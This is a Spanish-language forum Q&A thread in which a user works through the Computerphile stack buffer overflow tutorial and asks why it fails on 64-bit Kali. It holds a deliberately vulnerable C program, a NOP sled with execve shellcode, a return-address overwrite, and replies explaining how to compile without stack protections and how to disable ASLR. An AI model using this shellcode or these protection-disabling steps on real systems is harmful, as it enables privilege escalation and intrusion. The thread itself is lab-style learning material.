# Ataque Buffer Overflow

Tags: c

Estaba siguiendo el [vídeo de Computerphile](https://www.youtube.com/watch?v=1S0aBV-Waeo), que puede encontrarse por escrito en [Gist](https://gist.github.com/apolloclark/6cffb33f179cc9162d0a), pero me da error.

Explico, copié su programa programado en c:

```
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {
  char buffer[500];
  strcoy(buffer, argv[1]);
  return 0
}
```

Y lo compilé usando el comando

```
cc vuln.c vuln
```

Estoy usando Kali Linux en VirtualBox (x64), y empiezo con :

```
./envexec.sh -d vuln
```

Total, que empiezo con el programa y me doy cuenta del primer cambio. Él usó 508 caracteres (\x41), mientras que a mi me funciona :

```
  run $(python -c 'print "\x41" * 526') # (526 caracteres).
```

¿Es posible que se deba al sistema x64?

Sigo con el tutorial, con su shellcode... :

```
run $(python -c 'print "\x90" * 443 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x51\x51\x51\x51" * 10')
```

y en la parte que busca en lo que llama "línea de 90" no dice el comando ("in GDB [...] we can say 'list the registers', let's say about 200 of them, at the stack point of -550"), buscando encontré el comando `x/200x ($sp - 550)`, que la verdad no se ni lo que hace, pero lo puse y seleccioné la variable del medio de la primera línea de 90 que encontré.
La diferencia entre el vídeo y mi caso, es que la suya es: *bf ff fa ba* (4 "grupos"), mientras que la mia: `7f ff ff ff ee 70` (6). ¿¿También se debe al x64??

Al ejecutar su código, con mi variable "al revés" (como indica que ha de hacerse) y ajustando el número de caracteres vacíos para que todo funcione...

```
$ run $(python -c 'print "\x90" * 423 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x70\xee\xff\xff\xff\x7f" * 10')
Segmentation fault.
```

Lo extraño es que la variable está allí, pero con cuatro 0 delante (`0x00007fffffffee70`).

¿Alguien que pueda ayudarme?

edit: He intentado compilar el programa a 32 bits (`gcc -m32 vuln.c -o vuln32`), pero sigue sin funcionar. ¿He de usar sí o sí un sistema con arquitectura x32?
Usando `disas main` parece que el programa en x64:
[image: programa compilado en 64 bits]
tiene mejor pinta que el programa en x32:
[image: programa compilado en 32 bits]

Comment: Vamos mejorando. Ya no es que tengamos que mirar imágenes para ver el código ... ¡ Es que para entender tu pregunta hay que ver un vídeo !

Comment: @Trauma perdón, he puesto un link que lleva al tutorial por escrito, y he añadido 2 comandos "importantes" más, espero que puedan ayudar.

Comment: Deberías probar a compilarlo en 32 bits... este tipo de ataques son dependientes de la arquitectura... y 32 bits no es lo mismo que 64 bits... en 64 bits las direcciones tienen el doble de tamaño

Comment: ¿El sistema también ha de estar en x32? He actualizado el post con el 'disas main' de ambas versiones.

Comment: Prueba como te dijeron, a compilarlo en 32bits y usa el comando para compilar ( gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g vuln.c -o vuln ) si no el ASLR va a evitar que desborde...

Comment: @Caldodeparticulasprimigenio he usado tu comando ( `gcc -m32 -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g vuln.c -o vuln` ) y con '`disas main`' tiene mejor pinta (pero aún así, no igual que el vídeo). Esta vez el número de caracteres para que "funcione" son 512. Es cierto, que usando '`x/200x ($esp - 550)`' ahora sí me salen 4 grupos (y no 6 como antes, así que supongo que el x32 ha funcionado), y ejecutando su exploit (`run ...`) **funciona**. El problema es que usandolo en el programa ( `./envexec ~/Documentos/vuln32 $(python -c '...')` ) me pone 'Violación de segmento'

Comment: Solo te puedo decir que te veas bien el video por que debe haber algun detalle que se te escapa, en cuanto a lo de la violacion de segmento.. eso esta bien no? un buffer overflow no deja de ser una violacion del segmento de memoria.

Comment: @Caldodeparticulasprimigenio No se si me he explicado bien, ejecutándolo en envexec.sh funciona (me abre en root, deja ejecutar comandos...), el problema es ejecutandolo directamente como argumento.

Comment: antes me equivoque, el ASLR se quita asi ( echo 0 | sudo tee /proc/sys/kernel/randomize_va_space ) prueba así.

Comment: @Caldodeparticulasprimigenio Muchísimas gracias, ahora sí funciona.

Answer (score 3, accepted):

He conseguido que funcione, solo con esto:

1. Deshabilitar el ASLR: `echo 0 | sudo tee /proc/sys/kernel/randomize_va_space`
2. Compilar el programa en x32: `gcc -m32 -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g vuln.c -o vuln32`